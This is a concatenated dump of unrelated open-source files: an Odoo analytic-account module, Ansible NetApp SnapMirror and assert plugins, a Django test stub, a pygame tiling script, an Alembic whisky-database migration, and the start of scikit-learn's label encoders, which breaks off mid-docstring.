cr.execute('SELECT company_id, array_agg(id) as ids FROM account_analytic_account WHERE id IN %s GROUP BY company_id', (tuple(contract_ids),))
for company_id, ids in cr.fetchall():
context_contract = dict(context, company_id=company_id, force_company=company_id)
for contract in self.browse(cr, uid, ids, context=context_contract):
try:
invoice_values = self._prepare_invoice(cr, uid, contract, context=context_contract)
invoice_ids.append(self.pool['account.invoice'].create(cr, uid, invoice_values, context=context))
next_date = datetime.datetime.strptime(contract.recurring_next_date or current_date, "%Y-%m-%d")
interval = contract.recurring_interval
if contract.recurring_rule_type == 'daily':
new_date = next_date+relativedelta(days=+interval)
elif contract.recurring_rule_type == 'weekly':
new_date = next_date+relativedelta(weeks=+interval)
elif contract.recurring_rule_type == 'monthly':
new_date = next_date+relativedelta(months=+interval)
else:
new_date = next_date+relativedelta(years=+interval)
self.write(cr, uid, [contract.id], {'recurring_next_date': new_date.strftime('%Y-%m-%d')}, context=context)
if automatic:
cr.commit()
except Exception:
if automatic:
cr.rollback()
_logger.exception('Fail to create recurring invoice for contract %s', contract.code)
else:
raise
return invoice_ids
class account_analytic_account_summary_user(osv.osv):
_name = "account_analytic_analysis.summary.user"
_description = "Hours Summary by User"
_order='user'
_auto = False
_rec_name = 'user'
def _unit_amount(self, cr, uid, ids, name, arg, context=None):
res = {}
account_obj = self.pool.get('account.analytic.account')
cr.execute('SELECT MAX(id) FROM res_users')
max_user = cr.fetchone()[0]
account_ids = [int(str(x/max_user - (x%max_user == 0 and 1 or 0))) for x in ids]
user_ids = [int(str(x-((x/max_user - (x%max_user == 0 and 1 or 0)) *max_user))) for x in ids]
parent_ids = tuple(account_ids) #We don't want consolidation for each of these fields because those complex computation is resource-greedy.
if parent_ids:
cr.execute('SELECT id, unit_amount ' \
'FROM account_analytic_analysis_summary_user ' \
'WHERE account_id IN %s ' \
'AND "user" IN %s',(parent_ids, tuple(user_ids),))
for sum_id, unit_amount in cr.fetchall():
res[sum_id] = unit_amount
for id in ids:
res[id] = round(res.get(id, 0.0), 2)
return res
_columns = {
'account_id': fields.many2one('account.analytic.account', 'Analytic Account', readonly=True),
'unit_amount': fields.float('Total Time'),
'user': fields.many2one('res.users', 'User'),
}
_depends = {
'res.users': ['id'],
'account.analytic.line': ['account_id', 'journal_id', 'unit_amount', 'user_id'],
'account.analytic.journal': ['type'],
}
def init(self, cr):
openerp.tools.sql.drop_view_if_exists(cr, 'account_analytic_analysis_summary_user')
cr.execute('''CREATE OR REPLACE VIEW account_analytic_analysis_summary_user AS (
with mu as
(select max(id) as max_user from res_users)
, lu AS
(SELECT
l.account_id AS account_id,
coalesce(l.user_id, 0) AS user_id,
SUM(l.unit_amount) AS unit_amount
FROM account_analytic_line AS l,
account_analytic_journal AS j
WHERE (j.type = 'general' ) and (j.id=l.journal_id)
GROUP BY l.account_id, l.user_id
)
select (lu.account_id::bigint * mu.max_user) + lu.user_id as id,
lu.account_id as account_id,
lu.user_id as "user",
unit_amount
from lu, mu)''')
class account_analytic_account_summary_month(osv.osv):
_name = "account_analytic_analysis.summary.month"
_description = "Hours summary by month"
_auto = False
_rec_name = 'month'
_columns = {
'account_id': fields.many2one('account.analytic.account', 'Analytic Account', readonly=True),
'unit_amount': fields.float('Total Time'),
'month': fields.char('Month', size=32, readonly=True),
}
_depends = {
'account.analytic.line': ['account_id', 'date', 'journal_id', 'unit_amount'],
'account.analytic.journal': ['type'],
}
def init(self, cr):
openerp.tools.sql.drop_view_if_exists(cr, 'account_analytic_analysis_summary_month')
cr.execute('CREATE VIEW account_analytic_analysis_summary_month AS (' \
'SELECT ' \
'(TO_NUMBER(TO_CHAR(d.month, \'YYYYMM\'), \'999999\') + (d.account_id * 1000000::bigint))::bigint AS id, ' \
'd.account_id AS account_id, ' \
'TO_CHAR(d.month, \'Mon YYYY\') AS month, ' \
'TO_NUMBER(TO_CHAR(d.month, \'YYYYMM\'), \'999999\') AS month_id, ' \
'COALESCE(SUM(l.unit_amount), 0.0) AS unit_amount ' \
'FROM ' \
'(SELECT ' \
'd2.account_id, ' \
'd2.month ' \
'FROM ' \
'(SELECT ' \
'a.id AS account_id, ' \
'l.month AS month ' \
'FROM ' \
'(SELECT ' \
'DATE_TRUNC(\'month\', l.date) AS month ' \
'FROM account_analytic_line AS l, ' \
'account_analytic_journal AS j ' \
'WHERE j.type = \'general\' ' \
'GROUP BY DATE_TRUNC(\'month\', l.date) ' \
') AS l, ' \
'account_analytic_account AS a ' \
'GROUP BY l.month, a.id ' \
') AS d2 ' \
'GROUP BY d2.account_id, d2.month ' \
') AS d ' \
'LEFT JOIN ' \
'(SELECT ' \
'l.account_id AS account_id, ' \
'DATE_TRUNC(\'month\', l.date) AS month, ' \
'SUM(l.unit_amount) AS unit_amount ' \
'FROM account_analytic_line AS l, ' \
'account_analytic_journal AS j ' \
'WHERE (j.type = \'general\') and (j.id=l.journal_id) ' \
'GROUP BY l.account_id, DATE_TRUNC(\'month\', l.date) ' \
') AS l '
'ON (' \
'd.account_id = l.account_id ' \
'AND d.month = l.month' \
') ' \
'GROUP BY d.month, d.account_id ' \
')')
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
awkspace/ansible | refs/heads/devel | lib/ansible/modules/storage/netapp/na_ontap_snapmirror.py | 5 | #!/usr/bin/python
# (c) 2018-2019, NetApp, Inc
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'certified'}
DOCUMENTATION = '''
author: NetApp Ansible Team (@carchi8py) <[email protected]>
description:
- Create/Delete/Initialize SnapMirror volume/vserver relationships
- Modify schedule for a SnapMirror relationship
extends_documentation_fragment:
- netapp.na_ontap
module: na_ontap_snapmirror
options:
state:
choices: ['present', 'absent']
description:
- Whether the specified relationship should exist or not.
default: present
source_volume:
description:
- Specifies the name of the source volume for the SnapMirror.
destination_volume:
description:
- Specifies the name of the destination volume for the SnapMirror.
source_vserver:
description:
- Name of the source vserver for the SnapMirror.
destination_vserver:
description:
- Name of the destination vserver for the SnapMirror.
source_path:
description:
- Specifies the source endpoint of the SnapMirror relationship.
destination_path:
description:
- Specifies the destination endpoint of the SnapMirror relationship.
relationship_type:
choices: ['data_protection', 'load_sharing', 'vault', 'restore', 'transition_data_protection',
'extended_data_protection']
description:
- Specify the type of SnapMirror relationship.
schedule:
description:
- Specify the name of the current schedule, which is used to update the SnapMirror relationship.
- Optional for create, modifiable.
policy:
description:
- Specify the name of the SnapMirror policy that applies to this relationship.
version_added: "2.8"
source_hostname:
description:
- Source hostname or IP address.
- Required for SnapMirror delete
source_username:
description:
- Source username.
- Optional if this is same as destination username.
source_password:
description:
- Source password.
- Optional if this is same as destination password.
short_description: "NetApp ONTAP Manage SnapMirror"
version_added: "2.7"
'''
EXAMPLES = """
- name: Create SnapMirror
na_ontap_snapmirror:
state: present
source_volume: test_src
destination_volume: test_dest
source_vserver: ansible_src
destination_vserver: ansible_dest
schedule: hourly
policy: MirrorAllSnapshots
hostname: "{{ netapp_hostname }}"
username: "{{ netapp_username }}"
password: "{{ netapp_password }}"
- name: Delete SnapMirror
na_ontap_snapmirror:
state: absent
destination_path: <path>
source_hostname: "{{ source_hostname }}"
hostname: "{{ netapp_hostname }}"
username: "{{ netapp_username }}"
password: "{{ netapp_password }}"
- name: Set schedule to NULL
na_ontap_snapmirror:
state: present
destination_path: <path>
schedule: ""
hostname: "{{ netapp_hostname }}"
username: "{{ netapp_username }}"
password: "{{ netapp_password }}"
- name: Release SnapMirror
na_ontap_snapmirror:
state: release
destination_path: <path>
hostname: "{{ netapp_hostname }}"
username: "{{ netapp_username }}"
password: "{{ netapp_password }}"
"""
RETURN = """
"""
import traceback
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils._text import to_native
import ansible.module_utils.netapp as netapp_utils
from ansible.module_utils.netapp_module import NetAppModule
HAS_NETAPP_LIB = netapp_utils.has_netapp_lib()
class NetAppONTAPSnapmirror(object):
"""
Class with Snapmirror methods
"""
def __init__(self):
self.argument_spec = netapp_utils.na_ontap_host_argument_spec()
self.argument_spec.update(dict(
state=dict(required=False, type='str', choices=['present', 'absent'], default='present'),
source_vserver=dict(required=False, type='str'),
destination_vserver=dict(required=False, type='str'),
source_volume=dict(required=False, type='str'),
destination_volume=dict(required=False, type='str'),
source_path=dict(required=False, type='str'),
destination_path=dict(required=False, type='str'),
schedule=dict(required=False, type='str'),
policy=dict(required=False, type='str'),
relationship_type=dict(required=False, type='str',
choices=['data_protection', 'load_sharing',
'vault', 'restore',
'transition_data_protection',
'extended_data_protection']
),
source_hostname=dict(required=False, type='str'),
source_username=dict(required=False, type='str'),
source_password=dict(required=False, type='str', no_log=True)
))
self.module = AnsibleModule(
argument_spec=self.argument_spec,
required_together=(['source_volume', 'destination_volume'],
['source_vserver', 'destination_vserver']),
supports_check_mode=True
)
self.na_helper = NetAppModule()
self.parameters = self.na_helper.set_parameters(self.module.params)
# setup later if required
self.source_server = None
if HAS_NETAPP_LIB is False:
self.module.fail_json(msg="the python NetApp-Lib module is required")
else:
self.server = netapp_utils.setup_na_ontap_zapi(module=self.module)
def snapmirror_get_iter(self):
"""
Compose NaElement object to query current SnapMirror relations using destination-path
SnapMirror relation for a destination path is unique
:return: NaElement object for SnapMirror-get-iter
"""
snapmirror_get_iter = netapp_utils.zapi.NaElement('snapmirror-get-iter')
query = netapp_utils.zapi.NaElement('query')
snapmirror_info = netapp_utils.zapi.NaElement('snapmirror-info')
snapmirror_info.add_new_child('destination-location', self.parameters['destination_path'])
query.add_child_elem(snapmirror_info)
snapmirror_get_iter.add_child_elem(query)
return snapmirror_get_iter
def snapmirror_get(self):
"""
Get current SnapMirror relations
:return: Dictionary of current SnapMirror details if query successful, else None
"""
snapmirror_get_iter = self.snapmirror_get_iter()
snap_info = dict()
try:
result = self.server.invoke_successfully(snapmirror_get_iter, enable_tunneling=True)
except netapp_utils.zapi.NaApiError as error:
self.module.fail_json(msg='Error fetching snapmirror info: %s' % to_native(error),
exception=traceback.format_exc())
if result.get_child_by_name('num-records') and \
int(result.get_child_content('num-records')) > 0:
snapmirror_info = result.get_child_by_name('attributes-list').get_child_by_name(
'snapmirror-info')
snap_info['mirror_state'] = snapmirror_info.get_child_content('mirror-state')
snap_info['status'] = snapmirror_info.get_child_content('relationship-status')
snap_info['schedule'] = snapmirror_info.get_child_content('schedule')
snap_info['policy'] = snapmirror_info.get_child_content('policy')
if snap_info['schedule'] is None:
snap_info['schedule'] = ""
return snap_info
return None
def check_if_remote_volume_exists(self):
"""
Validate existence of source volume
:return: True if volume exists, False otherwise
"""
self.set_source_cluster_connection()
# do a get volume to check if volume exists or not
volume_info = netapp_utils.zapi.NaElement('volume-get-iter')
volume_attributes = netapp_utils.zapi.NaElement('volume-attributes')
volume_id_attributes = netapp_utils.zapi.NaElement('volume-id-attributes')
volume_id_attributes.add_new_child('name', self.parameters['source_volume'])
# if source_volume is present, then source_vserver is also guaranteed to be present
volume_id_attributes.add_new_child('vserver-name', self.parameters['source_vserver'])
volume_attributes.add_child_elem(volume_id_attributes)
query = netapp_utils.zapi.NaElement('query')
query.add_child_elem(volume_attributes)
volume_info.add_child_elem(query)
try:
result = self.source_server.invoke_successfully(volume_info, True)
except netapp_utils.zapi.NaApiError as error:
self.module.fail_json(msg='Error fetching source volume details %s : %s'
% (self.parameters['source_volume'], to_native(error)),
exception=traceback.format_exc())
if result.get_child_by_name('num-records') and int(result.get_child_content('num-records')) > 0:
return True
return False
def snapmirror_create(self):
"""
Create a SnapMirror relationship
"""
if self.parameters.get('source_hostname') and self.parameters.get('source_volume'):
if not self.check_if_remote_volume_exists():
self.module.fail_json(msg='Source volume does not exist. Please specify a volume that exists')
options = {'source-location': self.parameters['source_path'],
'destination-location': self.parameters['destination_path']}
snapmirror_create = netapp_utils.zapi.NaElement.create_node_with_children('snapmirror-create', **options)
if self.parameters.get('relationship_type'):
snapmirror_create.add_new_child('relationship-type', self.parameters['relationship_type'])
if self.parameters.get('schedule'):
snapmirror_create.add_new_child('schedule', self.parameters['schedule'])
if self.parameters.get('policy'):
snapmirror_create.add_new_child('policy', self.parameters['policy'])
try:
self.server.invoke_successfully(snapmirror_create, enable_tunneling=True)
self.snapmirror_initialize()
except netapp_utils.zapi.NaApiError as error:
self.module.fail_json(msg='Error creating SnapMirror %s' % to_native(error),
exception=traceback.format_exc())
def set_source_cluster_connection(self):
"""
Setup ontap ZAPI server connection for source hostname
:return: None
"""
if self.parameters.get('source_username'):
self.module.params['username'] = self.parameters['source_username']
if self.parameters.get('source_password'):
self.module.params['password'] = self.parameters['source_password']
self.module.params['hostname'] = self.parameters['source_hostname']
self.source_server = netapp_utils.setup_ontap_zapi(module=self.module)
def delete_snapmirror(self):
"""
Delete a SnapMirror relationship
#1. Quiesce the SnapMirror relationship at destination
#2. Break the SnapMirror relationship at the destination
#3. Release the SnapMirror at source
#4. Delete SnapMirror at destination
"""
if not self.parameters.get('source_hostname'):
self.module.fail_json(msg='Missing parameters for delete: Please specify the '
'source cluster hostname to release the SnapMirror relation')
self.set_source_cluster_connection()
self.snapmirror_quiesce()
if self.parameters.get('relationship_type') and \
self.parameters.get('relationship_type') not in ['load_sharing', 'vault']:
self.snapmirror_break()
if self.get_destination():
self.snapmirror_release()
self.snapmirror_delete()
def snapmirror_quiesce(self):
"""
Quiesce SnapMirror relationship - disable all future transfers to this destination
"""
options = {'destination-location': self.parameters['destination_path']}
snapmirror_quiesce = netapp_utils.zapi.NaElement.create_node_with_children(
'snapmirror-quiesce', **options)
try:
self.server.invoke_successfully(snapmirror_quiesce,
enable_tunneling=True)
except netapp_utils.zapi.NaApiError as error:
self.module.fail_json(msg='Error Quiescing SnapMirror : %s'
% (to_native(error)),
exception=traceback.format_exc())
def snapmirror_delete(self):
"""
Delete SnapMirror relationship at destination cluster
"""
options = {'destination-location': self.parameters['destination_path']}
snapmirror_delete = netapp_utils.zapi.NaElement.create_node_with_children(
'snapmirror-destroy', **options)
try:
self.server.invoke_successfully(snapmirror_delete,
enable_tunneling=True)
except netapp_utils.zapi.NaApiError as error:
self.module.fail_json(msg='Error deleting SnapMirror : %s'
% (to_native(error)),
exception=traceback.format_exc())
def snapmirror_break(self):
"""
Break SnapMirror relationship at destination cluster
"""
options = {'destination-location': self.parameters['destination_path']}
snapmirror_break = netapp_utils.zapi.NaElement.create_node_with_children(
'snapmirror-break', **options)
try:
self.server.invoke_successfully(snapmirror_break,
enable_tunneling=True)
except netapp_utils.zapi.NaApiError as error:
self.module.fail_json(msg='Error breaking SnapMirror relationship : %s'
% (to_native(error)),
exception=traceback.format_exc())
def snapmirror_release(self):
"""
Release SnapMirror relationship from source cluster
"""
options = {'destination-location': self.parameters['destination_path']}
snapmirror_release = netapp_utils.zapi.NaElement.create_node_with_children(
'snapmirror-release', **options)
try:
self.source_server.invoke_successfully(snapmirror_release,
enable_tunneling=True)
except netapp_utils.zapi.NaApiError as error:
self.module.fail_json(msg='Error releasing SnapMirror relationship : %s'
% (to_native(error)),
exception=traceback.format_exc())
def snapmirror_abort(self):
"""
Abort a SnapMirror relationship in progress
"""
options = {'destination-location': self.parameters['destination_path']}
snapmirror_abort = netapp_utils.zapi.NaElement.create_node_with_children(
'snapmirror-abort', **options)
try:
self.server.invoke_successfully(snapmirror_abort,
enable_tunneling=True)
except netapp_utils.zapi.NaApiError as error:
self.module.fail_json(msg='Error aborting SnapMirror relationship : %s'
% (to_native(error)),
exception=traceback.format_exc())
def snapmirror_initialize(self):
"""
Initialize SnapMirror based on relationship type
"""
current = self.snapmirror_get()
if current['mirror_state'] != 'snapmirrored':
initialize_zapi = 'snapmirror-initialize'
if self.parameters.get('relationship_type') and self.parameters['relationship_type'] == 'load_sharing':
initialize_zapi = 'snapmirror-initialize-ls-set'
options = {'source-location': self.parameters['source_path']}
else:
options = {'destination-location': self.parameters['destination_path']}
snapmirror_init = netapp_utils.zapi.NaElement.create_node_with_children(
initialize_zapi, **options)
try:
self.server.invoke_successfully(snapmirror_init,
enable_tunneling=True)
except netapp_utils.zapi.NaApiError as error:
self.module.fail_json(msg='Error initializing SnapMirror : %s'
% (to_native(error)),
exception=traceback.format_exc())
def snapmirror_modify(self, modify):
"""
Modify SnapMirror schedule or policy
"""
options = {'destination-location': self.parameters['destination_path']}
snapmirror_modify = netapp_utils.zapi.NaElement.create_node_with_children(
'snapmirror-modify', **options)
if modify.get('schedule') is not None:
snapmirror_modify.add_new_child('schedule', modify.get('schedule'))
if modify.get('policy'):
snapmirror_modify.add_new_child('policy', modify.get('policy'))
try:
self.server.invoke_successfully(snapmirror_modify,
enable_tunneling=True)
except netapp_utils.zapi.NaApiError as error:
self.module.fail_json(msg='Error modifying SnapMirror schedule or policy : %s'
% (to_native(error)),
exception=traceback.format_exc())
def snapmirror_update(self):
"""
Update data in destination endpoint
"""
options = {'destination-location': self.parameters['destination_path']}
snapmirror_update = netapp_utils.zapi.NaElement.create_node_with_children(
'snapmirror-update', **options)
try:
result = self.server.invoke_successfully(snapmirror_update,
enable_tunneling=True)
except netapp_utils.zapi.NaApiError as error:
self.module.fail_json(msg='Error updating SnapMirror : %s'
% (to_native(error)),
exception=traceback.format_exc())
def check_parameters(self):
"""
Validate parameters and fail if one or more required params are missing
Update source and destination path from vserver and volume parameters
"""
if self.parameters['state'] == 'present'\
and (self.parameters.get('source_path') or self.parameters.get('destination_path')):
if not self.parameters.get('destination_path') or not self.parameters.get('source_path'):
self.module.fail_json(msg='Missing parameters: Source path or Destination path')
elif self.parameters.get('source_volume'):
if not self.parameters.get('source_vserver') or not self.parameters.get('destination_vserver'):
self.module.fail_json(msg='Missing parameters: source vserver or destination vserver or both')
self.parameters['source_path'] = self.parameters['source_vserver'] + ":" + self.parameters['source_volume']
self.parameters['destination_path'] = self.parameters['destination_vserver'] + ":" +\
self.parameters['destination_volume']
elif self.parameters.get('source_vserver'):
self.parameters['source_path'] = self.parameters['source_vserver'] + ":"
self.parameters['destination_path'] = self.parameters['destination_vserver'] + ":"
def get_destination(self):
result = None
release_get = netapp_utils.zapi.NaElement('snapmirror-get-destination-iter')
query = netapp_utils.zapi.NaElement('query')
snapmirror_dest_info = netapp_utils.zapi.NaElement('snapmirror-destination-info')
snapmirror_dest_info.add_new_child('destination-location', self.parameters['destination_path'])
query.add_child_elem(snapmirror_dest_info)
release_get.add_child_elem(query)
try:
result = self.source_server.invoke_successfully(release_get, enable_tunneling=True)
except netapp_utils.zapi.NaApiError as error:
self.module.fail_json(msg='Error fetching snapmirror destinations info: %s' % to_native(error),
exception=traceback.format_exc())
if result.get_child_by_name('num-records') and \
int(result.get_child_content('num-records')) > 0:
return True
return None
def apply(self):
"""
Apply action to SnapMirror
"""
results = netapp_utils.get_cserver(self.server)
cserver = netapp_utils.setup_na_ontap_zapi(module=self.module, vserver=results)
netapp_utils.ems_log_event("na_ontap_snapmirror", cserver)
self.check_parameters()
current = self.snapmirror_get()
cd_action = self.na_helper.get_cd_action(current, self.parameters)
modify = self.na_helper.get_modified_attributes(current, self.parameters)
if cd_action == 'create':
self.snapmirror_create()
elif cd_action == 'delete':
if current['status'] == 'transferring':
self.snapmirror_abort()
else:
self.delete_snapmirror()
else:
if modify:
self.snapmirror_modify(modify)
# check for initialize
if current and current['mirror_state'] != 'snapmirrored':
self.snapmirror_initialize()
# set changed explicitly for initialize
self.na_helper.changed = True
# Update when create is called again, or modify is being called
if self.parameters['state'] == 'present':
self.snapmirror_update()
self.module.exit_json(changed=self.na_helper.changed)
def main():
"""Execute action"""
community_obj = NetAppONTAPSnapmirror()
community_obj.apply()
if __name__ == '__main__':
main()
|
cvlab-epfl/multicam-gt | refs/heads/master | gtm_hit/tests.py | 24123 | from django.test import TestCase
# Create your tests here.
|
simonmonk/prog_pi_ed2 | refs/heads/master | 08_pygame.py | 1 | import pygame
import sys
pygame.init()
screen = pygame.display.set_mode((256, 256))
pygame.display.set_caption('Caption')
ball_tile = pygame.image.load('ball.jpg').convert()
graph_rect = ball_tile.get_rect()
rows = int(256 / graph_rect.height) + 1
columns = int(256 / graph_rect.width) + 1
for y in xrange(rows):
for x in xrange(columns):
if x == 0 and y > 0:
graph_rect = graph_rect.move([-(columns -1) * graph_rect.width, graph_rect.height])
if x > 0:
graph_rect = graph_rect.move([graph_rect.width, 0])
screen.blit(ball_tile, graph_rect)
pygame.display.update()
while True:
for event in pygame.event.get():
if event.type == pygame.QUIT:
sys.exit();
|
vmindru/ansible | refs/heads/devel | lib/ansible/plugins/action/assert.py | 26 | # Copyright 2012, Dag Wieers <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.errors import AnsibleError
from ansible.playbook.conditional import Conditional
from ansible.plugins.action import ActionBase
from ansible.module_utils.six import string_types
class ActionModule(ActionBase):
''' Fail with custom message '''
TRANSFERS_FILES = False
_VALID_ARGS = frozenset(('fail_msg', 'msg', 'success_msg', 'that'))
def run(self, tmp=None, task_vars=None):
if task_vars is None:
task_vars = dict()
result = super(ActionModule, self).run(tmp, task_vars)
del tmp # tmp no longer has any effect
if 'that' not in self._task.args:
raise AnsibleError('conditional required in "that" string')
fail_msg = None
success_msg = None
fail_msg = self._task.args.get('fail_msg', self._task.args.get('msg'))
if fail_msg is None:
fail_msg = 'Assertion failed'
elif not isinstance(fail_msg, string_types):
raise AnsibleError('Incorrect type for fail_msg or msg, expected string and got %s' % type(fail_msg))
success_msg = self._task.args.get('success_msg')
if success_msg is None:
success_msg = 'All assertions passed'
elif not isinstance(success_msg, string_types):
raise AnsibleError('Incorrect type for success_msg, expected string and got %s' % type(success_msg))
# make sure the 'that' items are a list
thats = self._task.args['that']
if not isinstance(thats, list):
thats = [thats]
# Now we iterate over the that items, temporarily assigning them
# to the task's when value so we can evaluate the conditional using
# the built in evaluate function. The when has already been evaluated
# by this point, and is not used again, so we don't care about mangling
# that value now
cond = Conditional(loader=self._loader)
result['_ansible_verbose_always'] = True
for that in thats:
cond.when = [that]
test_result = cond.evaluate_conditional(templar=self._templar, all_vars=task_vars)
if not test_result:
result['failed'] = True
result['evaluated_to'] = test_result
result['assertion'] = that
result['msg'] = fail_msg
return result
result['changed'] = False
result['msg'] = success_msg
return result
|
cuducos/whiskyton | refs/heads/master | migrations/versions/8a208be6362_basic_structure.py | 1 | """Basic structure
Revision ID: 8a208be6362
Revises: ee26b6a2a19
Create Date: 2014-12-19 18:29:15.863743
"""
# revision identifiers, used by Alembic.
revision = '8a208be6362'
down_revision = 'ee26b6a2a19'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.create_table('whisky',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('distillery', sa.String(length=64), nullable=True),
sa.Column('slug', sa.String(length=64), nullable=True),
sa.Column('body', sa.Integer(), nullable=True),
sa.Column('sweetness', sa.Integer(), nullable=True),
sa.Column('smoky', sa.Integer(), nullable=True),
sa.Column('medicinal', sa.Integer(), nullable=True),
sa.Column('tobacco', sa.Integer(), nullable=True),
sa.Column('honey', sa.Integer(), nullable=True),
sa.Column('spicy', sa.Integer(), nullable=True),
sa.Column('winey', sa.Integer(), nullable=True),
sa.Column('nutty', sa.Integer(), nullable=True),
sa.Column('malty', sa.Integer(), nullable=True),
sa.Column('fruity', sa.Integer(), nullable=True),
sa.Column('floral', sa.Integer(), nullable=True),
sa.Column('postcode', sa.String(length=16), nullable=True),
sa.Column('latitude', sa.Integer(), nullable=True),
sa.Column('longitude', sa.Integer(), nullable=True),
sa.Column('views', sa.Integer(), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_whisky_distillery'), 'whisky', ['distillery'], unique=True)
op.create_index(op.f('ix_whisky_slug'), 'whisky', ['slug'], unique=True)
op.create_table('correlation',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('reference', sa.Integer(), nullable=True),
sa.Column('whisky', sa.Integer(), nullable=True),
sa.Column('r', sa.Float(), nullable=True),
sa.ForeignKeyConstraint(['whisky'], ['whisky.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_correlation_r'), 'correlation', ['r'], unique=False)
op.create_index(op.f('ix_correlation_reference'), 'correlation', ['reference'], unique=False)
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_index(op.f('ix_correlation_reference'), table_name='correlation')
op.drop_index(op.f('ix_correlation_r'), table_name='correlation')
op.drop_table('correlation')
op.drop_index(op.f('ix_whisky_slug'), table_name='whisky')
op.drop_index(op.f('ix_whisky_distillery'), table_name='whisky')
op.drop_table('whisky')
### end Alembic commands ###
|
ky822/scikit-learn | refs/heads/master | sklearn/preprocessing/label.py | 137 | # Authors: Alexandre Gramfort <[email protected]>
# Mathieu Blondel <[email protected]>
# Olivier Grisel <[email protected]>
# Andreas Mueller <[email protected]>
# Joel Nothman <[email protected]>
# Hamzeh Alsalhi <[email protected]>
# License: BSD 3 clause
from collections import defaultdict
import itertools
import array
import numpy as np
import scipy.sparse as sp
from ..base import BaseEstimator, TransformerMixin
from ..utils.fixes import np_version
from ..utils.fixes import sparse_min_max
from ..utils.fixes import astype
from ..utils.fixes import in1d
from ..utils import column_or_1d
from ..utils.validation import check_array
from ..utils.validation import check_is_fitted
from ..utils.validation import _num_samples
from ..utils.multiclass import unique_labels
from ..utils.multiclass import type_of_target
from ..externals import six
zip = six.moves.zip
map = six.moves.map
__all__ = [
'label_binarize',
'LabelBinarizer',
'LabelEncoder',
'MultiLabelBinarizer',
]
def _check_numpy_unicode_bug(labels):
"""Check that user is not subject to an old numpy bug
Fixed in master before 1.7.0:
https://github.com/numpy/numpy/pull/243
"""
if np_version[:3] < (1, 7, 0) and labels.dtype.kind == 'U':
raise RuntimeError("NumPy < 1.7.0 does not implement searchsorted"
" on unicode data correctly. Please upgrade"
" NumPy to use LabelEncoder with unicode inputs.")
class LabelEncoder(BaseEstimator, TransformerMixin):
"""Encode labels with value between 0 and n_classes-1.
Read more in the :ref:`User Guide <preprocessing_targets>`.
Attributes
----------
classes_ : array of shape (n_class,)
Holds the label for each class.
Examples
--------
`LabelEncoder` can be used to normalize labels.
>>> from sklearn import preprocessing
>>> le = preprocessing.LabelEncoder()
>>> le.fit([1, 2, 2, 6])
LabelEncoder()
>>> le.classes_
array([1, 2, 6])
>>> le.transform([1, 1, 2, 6]) #doctest: +ELLIPSIS
array([0, 0, 1, 2]...)
>>> le.inverse_transform([0, 0, 1, 2])
array([1, 1, 2, 6])
It can also be used to transform non-numerical labels (as long as they are
hashable and comparable) to numerical labels.
>>> le = preprocessing.LabelEncoder()
>>> le.fit(["paris", "paris", "tokyo", "amsterdam"])
LabelEncoder()
>>> list(le.classes_)
['amsterdam', 'paris', 'tokyo']
>>> le.transform(["tokyo", "tokyo", "paris"]) #doctest: +ELLIPSIS
array([2, 2, 1]...)
>>> list(le.inverse_transform([2, 2, 1]))
['tokyo', 'tokyo', 'paris']
"""
def fit(self, y):
"""Fit label encoder
Parameters
----------
y : array-like of shape (n_samples,)
Target values.
Returns
-------
self : returns an instance of self.
"""
y = column_or_1d(y, warn=True)
_check_numpy_unicode_bug(y)
self.classes_ = np.unique(y)
return self
def fit_transform(self, y):
"""Fit label encoder and return encoded labels
Parameters
----------
y : array-like of shape [n_samples]
Target values.
Returns
-------
y : array-like of shape [n_samples]
"""
y = column_or_1d(y, warn=True)
_check_numpy_unicode_bug(y)
self.classes_, y = np.unique(y, return_inverse=True)
return y
def transform(self, y):
"""Transform labels to normalized encoding.
Parameters
----------
y : array-like of shape [n_samples]
Target values.
Returns
-------
y : array-like of shape [n_samples]
"""
check_is_fitted(self, 'classes_')
classes = np.unique(y)
_check_numpy_unicode_bug(classes)
if len(np.intersect1d(classes, self.classes_)) < len(classes):
diff = np.setdiff1d(classes, self.classes_)
raise ValueError("y contains new labels: %s" % str(diff))
return np.searchsorted(self.classes_, y)
def inverse_transform(self, y):
"""Transform labels back to original encoding.
Parameters
----------
y : numpy array of shape [n_samples]
Target values.
Returns
-------
y : numpy array of shape [n_samples]
"""
check_is_fitted(self, 'classes_')
diff = np.setdiff1d(y, np.arange(len(self.classes_)))
if diff:
raise ValueError("y contains new labels: %s" % str(diff))
y = np.asarray(y)
return self.classes_[y]
class LabelBinarizer(BaseEstimator, TransformerMixin):
"""Binarize labels in a one-vs-all fashion
Several regression and binary classification algorithms are
available in the scikit. A simple way to extend these algorithms
to the multi-class classification case is to use the so-called
one-vs-all scheme.
At learning time, this simply consists in learning one regressor
or binary classifier per class. In doing so, one needs to convert
multi-class labels to binary labels (belong or does not belong
to the class). LabelBinarizer makes this process easy with the
transform method.
At prediction time, one assigns the class for which the corresponding
model gave the greatest confidence. LabelBinarizer makes this easy
with the inverse_transform method.
Read more in the :ref:`User Guide <preprocessing_targets>`.
Parameters
----------
neg_label : int (default: 0)
Value with which negative labels must be encoded.
pos_label : int (default: 1)
Value with which positive labels must be encoded.
sparse_output : boolean (default: False)
True if the returned array from transform is desired to be in sparse
CSR format.
Attributes
----------
classes_ : array of shape [n_class]
Holds the label for each class.
y_type_ : str,
Represents the type of the target data as evaluated by
